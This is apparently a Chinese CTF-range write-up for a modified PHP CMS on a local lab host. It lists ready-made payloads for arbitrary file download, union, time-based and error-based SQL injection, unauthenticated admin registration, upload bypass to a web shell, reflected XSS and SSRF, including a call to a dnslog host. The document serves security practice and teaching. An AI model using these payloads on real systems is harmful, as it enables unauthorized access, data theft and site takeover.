background

报着玩的比赛 没想到结果还行 还是比较白的

靶场是提交漏洞的 按点位算的 实网攻防就是hw 这里记录下靶场的漏洞 蛮基础的东西 比赛也不禁网 想到啥问题直接搜就行了

目录遍历

扫出来就是这个 东西都能看 但是没啥用

image-20241126175200057

任意文件下载

重点看mdownload.php.bak 很明显的任意文件读取

<?php

function MuDownloadFile($baseDir, $fileName) {
    // 组合文件路径
    $filePath = realpath($baseDir . '/' . $fileName);

    // 检查文件是否在指定目录下,防止目录遍历
    /*if (strpos($filePath, realpath($baseDir)) !== 0) {
        die("非法文件路径!");
    }*/

    // 检查文件是否存在
    if (!file_exists($filePath)) {
        die("文件不存在!");
    }

    // 设置响应头
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($filePath) . '"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filePath));

    // 清空缓冲区并输出文件内容
    ob_clean();
    flush();
    readfile($filePath);
    exit;
}

// 示例用法
$baseDir = $_SERVER['DOCUMENT_ROOT'] . '/upload/';
//echo $baseDir;
$fileName = $_GET["muxfile"];
if($fileName){
MuDownloadFile($baseDir, $fileName);
}
?>

robots.txt内容如下 qgqgxzxzx是后台地址 而且很贴心给了文件下载的调用方法index.php?r=mdownload

User-agent: *
Disallow: /index.php?r=pages&did=1
Disallow: /files
Disallow: /uploads
Disallow: /qgqgxzxzx
Disallow: /index.php?r=mdownload

poc如下

http://192.168.157.184/index.php?r=mdownload&muxfile=../index.php

sql注入1

首页列表那里

http://192.168.157.184/index.php?r=list&class=221'union select 1,2,version(),4,5,6,7,8,9--+

正常思路就是读账号密码进后台 这里ban了关键字

image-20241126180554499

这个靶场是二开过了了 但是基本结构不变的 网上下载源码 对着机构读list功能点对应的文件 可以看到过滤规则

不会绕 菜死了

image-20241126180813609

sql注入2

poc

http://192.168.157.184/?r=downloads&type=soft&line=pan&cid=1'and/**/sleep(6)--+

image-20241126195742811

管理员账户注册

接口

http://192.168.157.184/qgqgxzxzx/?r=register

image-20241126200210225

注册完了会返回sid

image-20241126200344318

后台这里可以激活管理员 激活之后登录直接就是后台

http://192.168.157.184/qgqgxzxzx/?r=activation&sid=2

image-20241126200517102

getshell

能上传图片的点都限制了 传不上 文件管理这里能shell

image-20241126201311700

口子

http://192.168.157.184/qgqgxzxzx/?r=fileupload

但是没给上传表单 得自己构造 查看后端代码 发现接收的是file 只检测了mime 后缀不能为php 直接大小写绕一下就行了

image-20241126202309445

传东西提示Incorrect integer value: ‘’ for column ‘img_kg’ at row 1

参考https://blog.csdn.net/sifeimeng/article/details/84740808修改配置文件

sql-mode="STRICT_TRANS_TABLES,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION",

改了之后口子这里还是传不上去 php版本的问题 我用的5.4.45成功了

image-20241126213747005

反射型xss1

http://127.0.0.1/?r=contact&page=<script>alert(77)</script>22

反射型xss2

http://127.0.0.1/?r=content&cid="/><script>alert(77)</script>

反射型xss3

http://127.0.0.1/?r=download&page=<script>alert(77)</script>

反射型xss4

http://127.0.0.1/?r=list&page=<script>alert(77)</script>

反射型xss5

http://127.0.0.1/?r=software&cid="/><script>alert(77)</script>

反射型xss6

cookie这里也能xss 不过比较鸡肋

image-20241203153642589

http://127.0.0.1/?r=content

cookie:name=" /><script>alert(77)</script>

后台反射xss1

http://127.0.0.1/qgqgxzxzx/?r=columnlist&delete=')</script><script>alert(77)</script>

后台反射xss2

http://127.0.0.1/qgqgxzxzx/?r=columnlist&delete2=')</script><script>alert(77)</script>

后台反射xss3

http://127.0.0.1/qgqgxzxzx/?r=commentlist&delete=')</script><script>alert(77)</script>

后台反射xss4

http://127.0.0.1/qgqgxzxzx/?r=commentlist&page=<script>alert(77)</script>

后台反射xss5

http://192.168.157.184/qgqgxzxzx/?r=softlist&page=<script>alert(77)</script>

后台反射xss6

http://192.168.157.184/qgqgxzxzx/?r=wzlist&page=<script>alert(77)</script>

后台反射xss7

http://192.168.157.184/qgqgxzxzx/?r=softlist&delete=</script><script>alert(77)</script>

后台注入1

POST /qgqgxzxzx/?r=editcolumn&type=1 HTTP/1.1
Host: 192.168.157.184
Content-Length: 760
Cache-Control: max-age=0
Origin: http://192.168.157.184
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.157.184/qgqgxzxzx/?r=editcolumn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bqoabevo7ibfncf5jasee4evi3; user=admin
Connection: close

------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="name"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="link"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="keywords"

00
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="description"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="content"

2'and updatexml(1,concat(0x7e,(select version()),0x7e),1)--'
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="xs"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="save"

1
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP--

后台注入2

POST /qgqgxzxzx/?r=editcolumn&type=2 HTTP/1.1
Host: 192.168.157.184
Content-Length: 760
Cache-Control: max-age=0
Origin: http://192.168.157.184
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.157.184/qgqgxzxzx/?r=editcolumn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: CSRF_TOKEN=2vakvByF5GcQrwsj; kodUserID=1; PHPSESSID=bqoabevo7ibfncf5jasee4evi3; user=admin
Connection: close

------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="name"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="link"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="keywords"

00
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="description"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="tuijian"

2'and updatexml(1,concat(0x7e,(select version()),0x7e),1)--'
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="xs"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="save"

1
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP--

后台注入3

http://192.168.157.184/qgqgxzxzx/?r=reply&type=2&id=2'and updatexml(1,concat(0x7e,(select version()),0x7e),1)--+

ssrf1

http://192.168.157.184/qgqgxzxzx/?r=update&url=dict://127.0.0.1:3306

ssrf2

这里的编辑器实际上用的是ueditor 这里改了名字而已 所以ueditor的洞可以直接打 其他的就懒得测了

http://192.168.157.184/seacmseditor/php/controller.php?action=catchimage&source[]=http://exp.otyzb0.dnslog.cn

然后就是挖洞嘛 robots.txt泄露后台地址 绝对路径泄露 注册那里可以穷举用户 后台操作一堆csrf

这些都算是漏洞